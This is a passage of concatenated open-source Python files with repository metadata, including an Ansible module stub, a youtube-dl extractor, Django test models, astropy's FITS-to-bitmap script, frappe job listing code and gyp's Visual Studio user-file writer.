    # The matched text is a single character from _xml_escape_map's keys.
    m = match.string[match.start() : match.end()]
    # don't replace single quotes in attrs
    if attr and m == "'":
      return m
    return _xml_escape_map[m]
  return _xml_escape_re.sub(replace, value)
|
mit
|
qrkourier/ansible
|
lib/ansible/modules/windows/win_pagefile.py
|
42
|
3966
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2017, Liran Nisanov <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
# Static module metadata consumed by Ansible's documentation tooling; the
# actual implementation lives in the .ps1 file of the same name.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_pagefile
version_added: "2.4"
short_description: Query or change pagefile configuration
description:
- Query current pagefile configuration.
- Enable/Disable AutomaticManagedPagefile.
- Create new or override pagefile configuration.
options:
drive:
description:
- The drive of the pagefile.
initial_size:
description:
- The initial size of the pagefile in megabytes.
maximum_size:
description:
- The maximum size of the pagefile in megabytes.
override:
description:
- Override the current pagefile on the drive.
type: bool
default: 'yes'
system_managed:
description:
- Configures current pagefile to be managed by the system.
type: bool
default: 'no'
automatic:
description:
- Configures AutomaticManagedPagefile for the entire system.
type: bool
remove_all:
description:
- Remove all pagefiles in the system, not including automatic managed.
type: bool
default: 'no'
test_path:
description:
- Use Test-Path on the drive to make sure the drive is accessible before creating the pagefile.
type: bool
default: 'yes'
state:
description:
- State of the pagefile.
choices:
- present
- absent
- query
default: query
notes:
- There is difference between automatic managed pagefiles that configured once for the entire system and system managed pagefile that configured per pagefile.
- InitialSize 0 and MaximumSize 0 means the pagefile is managed by the system.
- Value out of range exception may be caused by several different issues, two common problems - No such drive, Pagefile size is too small.
- Setting a pagefile when AutomaticManagedPagefile is on will disable the AutomaticManagedPagefile.
author:
- Liran Nisanov (@LiranNis)
'''
EXAMPLES = r'''
- name: Query pagefiles configuration
win_pagefile:
- name: Query C pagefile
win_pagefile:
drive: C
- name: Set C pagefile, don't override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
override: no
state: present
- name: Set C pagefile, override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
state: present
- name: Remove C pagefile
win_pagefile:
drive: C
state: absent
- name: Remove all current pagefiles, enable AutomaticManagedPagefile and query at the end
win_pagefile:
remove_all: yes
automatic: yes
- name: Remove all pagefiles disable AutomaticManagedPagefile and set C pagefile
win_pagefile:
drive: C
initial_size: 2048
maximum_size: 2048
remove_all: yes
automatic: no
state: present
- name: Set D pagefile, override if exists
win_pagefile:
drive: d
initial_size: 1024
maximum_size: 1024
state: present
'''
RETURN = r'''
automatic_managed_pagefiles:
description: Whether the pagefiles is automatically managed.
returned: When state is query.
type: boolean
sample: true
pagefiles:
description: Contains caption, description, initial_size, maximum_size and name for each pagefile in the system.
returned: When state is query.
type: list
sample:
[{"caption": "c:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ c:\\", "initial_size": 2048, "maximum_size": 2048, "name": "c:\\pagefile.sys"},
{"caption": "d:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ d:\\", "initial_size": 1024, "maximum_size": 1024, "name": "d:\\pagefile.sys"}]
'''
|
gpl-3.0
|
kidburglar/youtube-dl
|
youtube_dl/extractor/crooksandliars.py
|
64
|
2061
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
qualities,
)
class CrooksAndLiarsIE(InfoExtractor):
    # Extractor for embed.crooksandliars.com /embed/ and /v/ pages.
    _VALID_URL = r'https?://embed\.crooksandliars\.com/(?:embed|v)/(?P<id>[A-Za-z0-9]+)'
    _TESTS = [{
        'url': 'https://embed.crooksandliars.com/embed/8RUoRhRi',
        'info_dict': {
            'id': '8RUoRhRi',
            'ext': 'mp4',
            'title': 'Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!',
            'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
            'thumbnail': r're:^https?://.*\.jpg',
            'timestamp': 1428207000,
            'upload_date': '20150405',
            'uploader': 'Heather',
            'duration': 236,
        }
    }, {
        'url': 'http://embed.crooksandliars.com/v/MTE3MjUtMzQ2MzA',
        'only_matching': True,
    }]
    def _real_extract(self, url):
        video_id = self._match_id(url)
        # Always fetch the canonical /embed/ page, whichever URL form matched.
        webpage = self._download_webpage(
            'http://embed.crooksandliars.com/embed/%s' % video_id, video_id)
        # The page inlines the metadata as JavaScript: var manifest = {...}
        manifest = self._parse_json(
            self._search_regex(
                r'var\s+manifest\s*=\s*({.+?})\n', webpage, 'manifest JSON'),
            video_id)
        quality = qualities(('webm_low', 'mp4_low', 'webm_high', 'mp4_high'))
        formats = [{
            'url': item['url'],
            'format_id': item['type'],
            'quality': quality(item['type']),
        } for item in manifest['flavors'] if item['mime'].startswith('video/')]
        self._sort_formats(formats)
        return {
            # NOTE(review): 'url' is the input page URL while 'formats' holds
            # the media URLs -- confirm the top-level 'url' key is intentional.
            'url': url,
            'id': video_id,
            'title': manifest['title'],
            'description': manifest.get('description'),
            'thumbnail': self._proto_relative_url(manifest.get('poster')),
            'timestamp': int_or_none(manifest.get('created')),
            'uploader': manifest.get('author'),
            'duration': int_or_none(manifest.get('duration')),
            'formats': formats,
        }
|
unlicense
|
auready/django
|
tests/db_functions/models.py
|
11
|
1699
|
"""
Tests for built in Function expressions.
"""
from django.db import models
class Author(models.Model):
    """Writer with an optional alias and nickname; used by function tests."""
    name = models.CharField(max_length=50)
    alias = models.CharField(max_length=50, null=True, blank=True)
    goes_by = models.CharField(max_length=50, null=True, blank=True)
    age = models.PositiveSmallIntegerField(default=30)
    def __str__(self):
        return self.name
class Article(models.Model):
    """Article with M2M authors and several nullable datetime fields."""
    authors = models.ManyToManyField(Author, related_name='articles')
    title = models.CharField(max_length=50)
    summary = models.CharField(max_length=200, null=True, blank=True)
    text = models.TextField()
    written = models.DateTimeField()
    published = models.DateTimeField(null=True, blank=True)
    updated = models.DateTimeField(null=True, blank=True)
    views = models.PositiveIntegerField(default=0)
    def __str__(self):
        return self.title
class Fan(models.Model):
    """Fan of a single Author (cascade-deleted with the author)."""
    name = models.CharField(max_length=50)
    age = models.PositiveSmallIntegerField(default=30)
    author = models.ForeignKey(Author, models.CASCADE, related_name='fans')
    def __str__(self):
        return self.name
class DTModel(models.Model):
    """Model exposing every date/time field type for function tests."""
    name = models.CharField(max_length=32)
    start_datetime = models.DateTimeField(null=True, blank=True)
    end_datetime = models.DateTimeField(null=True, blank=True)
    start_date = models.DateField(null=True, blank=True)
    end_date = models.DateField(null=True, blank=True)
    start_time = models.TimeField(null=True, blank=True)
    end_time = models.TimeField(null=True, blank=True)
    duration = models.DurationField(null=True, blank=True)
    def __str__(self):
        return 'DTModel({0})'.format(self.name)
|
bsd-3-clause
|
sonuyos/couchpotato
|
libs/suds/mx/typer.py
|
203
|
4116
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Provides sx typing classes.
"""
from logging import getLogger
from suds import *
from suds.mx import *
from suds.sax import Namespace as NS
from suds.sax.text import Text
log = getLogger(__name__)
class Typer:
    """
    Provides XML node typing as either automatic or manual.
    @cvar types: A dict of class to xs type mapping.
    @type types: dict
    """
    # Python class -> (xsd type name, namespace).  long and unicode exist
    # only on Python 2; this module is Python-2-only code.
    types = {
        int : ('int', NS.xsdns),
        long : ('long', NS.xsdns),
        float : ('float', NS.xsdns),
        str : ('string', NS.xsdns),
        unicode : ('string', NS.xsdns),
        Text : ('string', NS.xsdns),
        bool : ('boolean', NS.xsdns),
    }
    @classmethod
    def auto(cls, node, value=None):
        """
        Automatically set the node's xsi:type attribute based on either I{value}'s
        class or the class of the node's text. When I{value} is an unmapped class,
        the default type (xs:any) is set.
        @param node: An XML node
        @type node: L{sax.element.Element}
        @param value: An object that is or would be the node's text.
        @type value: I{any}
        @return: The specified node.
        @rtype: L{sax.element.Element}
        """
        if value is None:
            value = node.getText()
        if isinstance(value, Object):
            # NOTE(review): known() returns None when value has no
            # __metadata__.sxtype; known.name below would then raise
            # AttributeError -- confirm Object instances always carry it.
            known = cls.known(value)
            if known.name is None:
                return node
            tm = (known.name, known.namespace())
        else:
            # Unmapped classes fall back to the xs:string entry.
            tm = cls.types.get(value.__class__, cls.types.get(str))
        cls.manual(node, *tm)
        return node
    @classmethod
    def manual(cls, node, tval, ns=None):
        """
        Set the node's xsi:type attribute based on either I{value}'s
        class or the class of the node's text. Then adds the referenced
        prefix(s) to the node's prefix mapping.
        @param node: An XML node
        @type node: L{sax.element.Element}
        @param tval: The name of the schema type.
        @type tval: str
        @param ns: The XML namespace of I{tval}.
        @type ns: (prefix, uri)
        @return: The specified node.
        @rtype: L{sax.element.Element}
        """
        xta = ':'.join((NS.xsins[0], 'type'))
        node.addPrefix(NS.xsins[0], NS.xsins[1])
        if ns is None:
            node.set(xta, tval)
        else:
            # Qualify tval with a (possibly generated) prefix for ns.
            ns = cls.genprefix(node, ns)
            qname = ':'.join((ns[0], tval))
            node.set(xta, qname)
            node.addPrefix(ns[0], ns[1])
        return node
    @classmethod
    def genprefix(cls, node, ns):
        """
        Generate a prefix.
        @param node: An XML node on which the prefix will be used.
        @type node: L{sax.element.Element}
        @param ns: A namespace needing an unique prefix.
        @type ns: (prefix, uri)
        @return: The I{ns} with a new prefix.
        """
        # Probe ns1..ns1023 for a prefix that is unbound or already bound
        # to the wanted URI.
        for n in range(1, 1024):
            p = 'ns%d' % n
            u = node.resolvePrefix(p, default=None)
            if u is None or u == ns[1]:
                return (p, ns[1])
        raise Exception('auto prefix, exhausted')
    @classmethod
    def known(cls, object):
        # Returns the sxtype from the object's metadata, or implicitly None
        # when the metadata/attribute is missing (any error is swallowed).
        try:
            md = object.__metadata__
            known = md.sxtype
            return known
        except:
            pass
|
gpl-3.0
|
ubc/edx-platform
|
lms/djangoapps/shoppingcart/processors/__init__.py
|
215
|
2574
|
"""
Public API for payment processor implementations.
The specific implementation is determined at runtime using Django settings:
CC_PROCESSOR_NAME: The name of the Python module (in `shoppingcart.processors`) to use.
CC_PROCESSOR: Dictionary of configuration options for specific processor implementations,
keyed to processor names.
"""
from django.conf import settings
# Import the processor implementation, using `CC_PROCESSOR_NAME`
# as the name of the Python module in `shoppingcart.processors`
PROCESSOR_MODULE = __import__(
'shoppingcart.processors.' + settings.CC_PROCESSOR_NAME,
fromlist=[
'render_purchase_form_html',
'process_postpay_callback',
'get_purchase_endpoint',
'get_signed_purchase_params',
]
)
def render_purchase_form_html(cart, **kwargs):
    """
    Render an HTML form with POSTs to the hosted payment processor.
    Args:
        cart (Order): The order model representing items in the user's cart.
    Returns:
        unicode: the rendered HTML form
    """
    # Delegate to the implementation selected by CC_PROCESSOR_NAME.
    return PROCESSOR_MODULE.render_purchase_form_html(cart, **kwargs)
def process_postpay_callback(params, **kwargs):
    """
    Handle a response from the payment processor.
    Concrete implementations should:
    1) Verify the parameters and determine if the payment was successful.
    2) If successful, mark the order as purchased and call `purchased_callbacks` of the cart items.
    3) If unsuccessful, try to figure out why and generate a helpful error message.
    4) Return a dictionary of the form:
    {'success': bool, 'order': Order, 'error_html': str}
    Args:
        params (dict): Dictionary of parameters received from the payment processor.
    Keyword Args:
        Can be used to provide additional information to concrete implementations.
    Returns:
        dict
    """
    # Delegate to the implementation selected by CC_PROCESSOR_NAME.
    return PROCESSOR_MODULE.process_postpay_callback(params, **kwargs)
def get_purchase_endpoint():
    """
    Return the URL of the current payment processor's endpoint.
    Returns:
        unicode
    """
    # Delegate to the implementation selected by CC_PROCESSOR_NAME.
    return PROCESSOR_MODULE.get_purchase_endpoint()
def get_signed_purchase_params(cart, **kwargs):
    """
    Return the parameters to send to the current payment processor.
    Args:
        cart (Order): The order model representing items in the user's cart.
    Keyword Args:
        Can be used to provide additional information to concrete implementations.
    Returns:
        dict
    """
    # Delegate to the implementation selected by CC_PROCESSOR_NAME.
    return PROCESSOR_MODULE.get_signed_purchase_params(cart, **kwargs)
|
agpl-3.0
|
Zhongqilong/mykbengineer
|
kbe/res/scripts/common/Lib/site-packages/pip/_vendor/requests/packages/chardet/big5prober.py
|
2931
|
1684
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import Big5DistributionAnalysis
from .mbcssm import Big5SMModel
class Big5Prober(MultiByteCharSetProber):
    # Detects the Big5 (traditional Chinese) encoding by pairing the Big5
    # coding state machine with its character-distribution analyser.
    def __init__(self):
        MultiByteCharSetProber.__init__(self)
        self._mCodingSM = CodingStateMachine(Big5SMModel)
        self._mDistributionAnalyzer = Big5DistributionAnalysis()
        self.reset()
    def get_charset_name(self):
        return "Big5"
|
lgpl-3.0
|
whitepyro/debian_server_setup
|
lib/MultipartPostHandler.py
|
62
|
3557
|
#!/usr/bin/python
####
# 06/2010 Nic Wolfe <[email protected]>
# 02/2006 Will Holcomb <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
import urllib
import urllib2
import mimetools, mimetypes
import os, sys
# Controls how sequences are uncoded. If true, elements may be given multiple values by
# assigning a sequence.
doseq = 1
class MultipartPostHandler(urllib2.BaseHandler):
    # urllib2 handler that transparently encodes dict request bodies as
    # multipart/form-data when they contain file values.  Python 2 only
    # (print statement, three-argument raise, builtin `file` type).
    handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
    def http_request(self, request):
        # Non-string data (a mapping) is split into file-like values and
        # plain variables; string data passes through untouched.
        data = request.get_data()
        if data is not None and type(data) != str:
            v_files = []
            v_vars = []
            try:
                for(key, value) in data.items():
                    if type(value) in (file, list, tuple):
                        v_files.append((key, value))
                    else:
                        v_vars.append((key, value))
            except TypeError:
                systype, value, traceback = sys.exc_info()
                raise TypeError, "not a valid non-string sequence or mapping object", traceback
            if len(v_files) == 0:
                # No files: ordinary urlencoded form body.
                data = urllib.urlencode(v_vars, doseq)
            else:
                boundary, data = MultipartPostHandler.multipart_encode(v_vars, v_files)
                contenttype = 'multipart/form-data; boundary=%s' % boundary
                if(request.has_header('Content-Type')
                   and request.get_header('Content-Type').find('multipart/form-data') != 0):
                    print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
                request.add_unredirected_header('Content-Type', contenttype)
            request.add_data(data)
        return request
    @staticmethod
    def multipart_encode(vars, files, boundary = None, buffer = None):
        # Builds a multipart/form-data body; returns (boundary, body).
        if boundary is None:
            boundary = mimetools.choose_boundary()
        if buffer is None:
            buffer = ''
        for(key, value) in vars:
            buffer += '--%s\r\n' % boundary
            buffer += 'Content-Disposition: form-data; name="%s"' % key
            buffer += '\r\n\r\n' + value + '\r\n'
        for(key, fd) in files:
            # allow them to pass in a file or a tuple with name & data
            # NOTE(review): if fd is neither a file nor a tuple/list,
            # name_in/data_in are unbound below -- confirm callers only pass
            # those two shapes.
            if type(fd) == file:
                name_in = fd.name
                fd.seek(0)
                data_in = fd.read()
            elif type(fd) in (tuple, list):
                name_in, data_in = fd
            filename = os.path.basename(name_in)
            contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
            buffer += '--%s\r\n' % boundary
            buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
            buffer += 'Content-Type: %s\r\n' % contenttype
            # buffer += 'Content-Length: %s\r\n' % file_size
            buffer += '\r\n' + data_in + '\r\n'
        buffer += '--%s--\r\n\r\n' % boundary
        return boundary, buffer
    https_request = http_request
|
gpl-3.0
|
MSeifert04/astropy
|
astropy/visualization/scripts/fits2bitmap.py
|
2
|
7795
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
from distutils.version import LooseVersion
from astropy.visualization.mpl_normalize import simple_norm
from astropy import log
from astropy.io.fits import getdata
def fits2bitmap(filename, ext=0, out_fn=None, stretch='linear',
                power=1.0, asinh_a=0.1, min_cut=None, max_cut=None,
                min_percent=None, max_percent=None, percent=None,
                cmap='Greys_r'):
    """
    Create a bitmap file from a FITS image, applying a stretching
    transform between minimum and maximum cut levels and a matplotlib
    colormap.
    Parameters
    ----------
    filename : str
        The filename of the FITS file.
    ext : int
        FITS extension name or number of the image to convert. The
        default is 0.
    out_fn : str
        The filename of the output bitmap image. The type of bitmap
        is determined by the filename extension (e.g. '.jpg', '.png').
        The default is a PNG file with the same name as the FITS file.
    stretch : {{'linear', 'sqrt', 'power', log', 'asinh'}}
        The stretching function to apply to the image. The default is
        'linear'.
    power : float, optional
        The power index for ``stretch='power'``. The default is 1.0.
    asinh_a : float, optional
        For ``stretch='asinh'``, the value where the asinh curve
        transitions from linear to logarithmic behavior, expressed as a
        fraction of the normalized image. Must be in the range between
        0 and 1. The default is 0.1.
    min_cut : float, optional
        The pixel value of the minimum cut level. Data values less than
        ``min_cut`` will set to ``min_cut`` before stretching the image.
        The default is the image minimum. ``min_cut`` overrides
        ``min_percent``.
    max_cut : float, optional
        The pixel value of the maximum cut level. Data values greater
        than ``min_cut`` will set to ``min_cut`` before stretching the
        image. The default is the image maximum. ``max_cut`` overrides
        ``max_percent``.
    min_percent : float, optional
        The percentile value used to determine the pixel value of
        minimum cut level. The default is 0.0. ``min_percent``
        overrides ``percent``.
    max_percent : float, optional
        The percentile value used to determine the pixel value of
        maximum cut level. The default is 100.0. ``max_percent``
        overrides ``percent``.
    percent : float, optional
        The percentage of the image values used to determine the pixel
        values of the minimum and maximum cut levels. The lower cut
        level will set at the ``(100 - percent) / 2`` percentile, while
        the upper cut level will be set at the ``(100 + percent) / 2``
        percentile. The default is 100.0. ``percent`` is ignored if
        either ``min_percent`` or ``max_percent`` is input.
    cmap : str
        The matplotlib color map name. The default is 'Greys_r'.
    """
    import matplotlib
    import matplotlib.cm as cm
    import matplotlib.image as mimg
    # __main__ gives ext as a string
    try:
        ext = int(ext)
    except ValueError:
        pass
    try:
        image = getdata(filename, ext)
    except Exception as e:
        log.critical(e)
        return 1
    if image.ndim != 2:
        log.critical('data in FITS extension {} is not a 2D array'
                     .format(ext))
        # Bug fix: previously fell through after logging, crashing later in
        # simple_norm/imsave; return the error code like the other failures.
        return 1
    if out_fn is None:
        out_fn = os.path.splitext(filename)[0]
        if out_fn.endswith('.fits'):
            out_fn = os.path.splitext(out_fn)[0]
        out_fn += '.png'
    # need to explicitly define the output format due to a bug in
    # matplotlib (<= 2.1), otherwise the format will always be PNG
    out_format = os.path.splitext(out_fn)[1][1:]
    # workaround for matplotlib 2.0.0 bug where png images are inverted
    # (mpl-#7656)
    if (out_format.lower() == 'png' and
            LooseVersion(matplotlib.__version__) == LooseVersion('2.0.0')):
        image = image[::-1]
    try:
        cm.get_cmap(cmap)
    except ValueError:
        log.critical('{} is not a valid matplotlib colormap name.'
                     .format(cmap))
        return 1
    norm = simple_norm(image, stretch=stretch, power=power, asinh_a=asinh_a,
                       min_cut=min_cut, max_cut=max_cut,
                       min_percent=min_percent, max_percent=max_percent,
                       percent=percent)
    mimg.imsave(out_fn, norm(image), cmap=cmap, origin='lower',
                format=out_format)
    log.info(f'Saved file to {out_fn}.')
def main(args=None):
    """Command-line entry point: convert one or more FITS files to bitmaps."""
    import argparse
    parser = argparse.ArgumentParser(
        description='Create a bitmap file from a FITS image.')
    parser.add_argument('-e', '--ext', metavar='hdu', default=0,
                        help='Specify the HDU extension number or name '
                             '(Default is 0).')
    parser.add_argument('-o', metavar='filename', type=str, default=None,
                        help='Filename for the output image (Default is a '
                             'PNG file with the same name as the FITS file).')
    parser.add_argument('--stretch', type=str, default='linear',
                        help='Type of image stretching ("linear", "sqrt", '
                             '"power", "log", or "asinh") (Default is "linear").')
    parser.add_argument('--power', type=float, default=1.0,
                        help='Power index for "power" stretching (Default is '
                             '1.0).')
    parser.add_argument('--asinh_a', type=float, default=0.1,
                        help='The value in normalized image where the asinh '
                             'curve transitions from linear to logarithmic '
                             'behavior (used only for "asinh" stretch) '
                             '(Default is 0.1).')
    parser.add_argument('--min_cut', type=float, default=None,
                        help='The pixel value of the minimum cut level '
                             '(Default is the image minimum).')
    parser.add_argument('--max_cut', type=float, default=None,
                        help='The pixel value of the maximum cut level '
                             '(Default is the image maximum).')
    parser.add_argument('--min_percent', type=float, default=None,
                        help='The percentile value used to determine the '
                             'minimum cut level (Default is 0).')
    parser.add_argument('--max_percent', type=float, default=None,
                        help='The percentile value used to determine the '
                             'maximum cut level (Default is 100).')
    parser.add_argument('--percent', type=float, default=None,
                        help='The percentage of the image values used to '
                             'determine the pixel values of the minimum and '
                             'maximum cut levels (Default is 100).')
    parser.add_argument('--cmap', metavar='colormap_name', type=str,
                        default='Greys_r', help='matplotlib color map name '
                                                '(Default is "Greys_r").')
    parser.add_argument('filename', nargs='+',
                        help='Path to one or more FITS files to convert')
    args = parser.parse_args(args)
    # Convert each requested file with the shared option set.
    for filename in args.filename:
        fits2bitmap(filename, ext=args.ext, out_fn=args.o,
                    stretch=args.stretch, min_cut=args.min_cut,
                    max_cut=args.max_cut, min_percent=args.min_percent,
                    max_percent=args.max_percent, percent=args.percent,
                    power=args.power, asinh_a=args.asinh_a, cmap=args.cmap)
|
bsd-3-clause
|
neilLasrado/frappe
|
frappe/core/page/background_jobs/background_jobs.py
|
17
|
1197
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from rq import Queue, Worker
from frappe.utils.background_jobs import get_redis_conn
from frappe.utils import format_datetime, cint
# Maps an RQ job status to the indicator color shown on the
# background-jobs page (used via colors[j.status] in get_info below).
colors = {
    'queued': 'orange',
    'failed': 'red',
    'started': 'blue',
    'finished': 'green'
}
@frappe.whitelist()
def get_info(show_failed=False):
    """Return queued/running (and optionally failed) RQ jobs for the current site.

    Each entry carries the job name, status, queue name, creation time and a
    display color; failed jobs additionally carry their traceback.
    """
    conn = get_redis_conn()
    all_queues = Queue.all(conn)
    all_workers = Worker.all(conn)
    jobs = []

    def append_job(job, queue_name):
        # Only report jobs that belong to the current site.
        if job.kwargs.get('site') != frappe.local.site:
            return
        entry = {
            'job_name': job.kwargs.get('kwargs', {}).get('playbook_method')
                or str(job.kwargs.get('job_name')),
            'status': job.status,
            'queue': queue_name,
            'creation': format_datetime(job.created_at),
            'color': colors[job.status]
        }
        jobs.append(entry)
        if job.exc_info:
            entry['exc_info'] = job.exc_info

    # Jobs currently being executed by workers.
    for worker in all_workers:
        current = worker.get_current_job()
        if current:
            append_job(current, worker.name)

    # Jobs still waiting in the non-failed queues.
    for queue in all_queues:
        if queue.name != 'failed':
            for job in queue.get_jobs():
                append_job(job, queue.name)

    # Optionally include up to 10 failed jobs.
    if cint(show_failed):
        for queue in all_queues:
            if queue.name == 'failed':
                for job in queue.get_jobs()[:10]:
                    append_job(job, queue.name)

    return jobs
|
mit
|
aricchen/openHR
|
openerp/addons/base_gengo/__init__.py
|
57
|
1104
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Openerp sa (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import res_company
import ir_translation
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Jet-Streaming/gyp
|
build/lib/gyp/MSVSUserFile.py
|
8
|
5241
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
  """Visual Studio XML user file writer.

  Accumulates per-configuration debug settings and serializes them as a
  VisualStudioUserFile document via gyp.easy_xml.
  """

  def __init__(self, user_file_path, version, name):
    """Initializes the user file.

    Args:
      user_file_path: Path to the user file.
      version: Version info.
      name: Name of the user file.
    """
    self.user_file_path = user_file_path
    self.version = version
    self.name = name
    # Maps configuration name -> easy_xml spec for that configuration.
    self.configurations = {}

  def AddConfig(self, name):
    """Adds a configuration to the project.

    Args:
      name: Configuration name.
    """
    self.configurations[name] = ['Configuration', {'Name': name}]

  def AddDebugSettings(self, config_name, command, environment=None,
                       working_directory=""):
    """Adds a DebugSettings node to the user file for a particular config.

    Args:
      config_name: Name of the configuration the settings apply to.
      command: command line to run. First element in the list is the
        executable. All elements of the command will be quoted if
        necessary.
      environment: optional dict of environment variables for the debuggee.
        (Was previously a mutable default `{}`, which Python shares across
        calls; None is the safe equivalent and behaves identically here.)
      working_directory: working directory for the debuggee. (optional)
    """
    command = _QuoteWin32CommandLineArgs(command)

    abs_command = _FindCommandInPath(command[0])

    if environment and isinstance(environment, dict):
      # items() instead of the Python-2-only iteritems() keeps this file
      # importable under both Python 2 and 3.
      env_list = ['%s="%s"' % (key, val)
                  for (key, val) in environment.items()]
      environment = ' '.join(env_list)
    else:
      environment = ''

    n_cmd = ['DebugSettings',
             {'Command': abs_command,
              'WorkingDirectory': working_directory,
              'CommandArguments': " ".join(command[1:]),
              'RemoteMachine': socket.gethostname(),
              'Environment': environment,
              'EnvironmentMerge': 'true',
              # Currently these are all "dummy" values that we're just setting
              # in the default manner that MSVS does it.  We could use some of
              # these to add additional capabilities, I suppose, but they might
              # not have parity with other platforms then.
              'Attach': 'false',
              'DebuggerType': '3',  # 'auto' debugger
              'Remote': '1',
              'RemoteCommand': '',
              'HttpUrl': '',
              'PDBPath': '',
              'SQLDebugging': '',
              'DebuggerFlavor': '0',
              'MPIRunCommand': '',
              'MPIRunArguments': '',
              'MPIRunWorkingDirectory': '',
              'ApplicationCommand': '',
              'ApplicationArguments': '',
              'ShimCommand': '',
              'MPIAcceptMode': '',
              'MPIAcceptFilter': ''
             }]

    # Find the config, and add it if it doesn't exist.
    if config_name not in self.configurations:
      self.AddConfig(config_name)

    # Add the DebugSettings onto the appropriate config.
    self.configurations[config_name].append(n_cmd)

  def WriteIfChanged(self):
    """Writes the user file, touching disk only when content changed."""
    configs = ['Configurations']
    # Sorted for deterministic output across runs.
    for config, spec in sorted(self.configurations.items()):
      configs.append(spec)

    content = ['VisualStudioUserFile',
               {'Version': self.version.ProjectVersion(),
                'Name': self.name
               },
               configs]
    easy_xml.WriteXmlIfChanged(content, self.user_file_path,
                               encoding="Windows-1252")
|
bsd-3-clause
|
jessrosenfield/pants
|
src/python/pants/backend/core/tasks/target_filter_task_mixin.py
|
7
|
1504
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
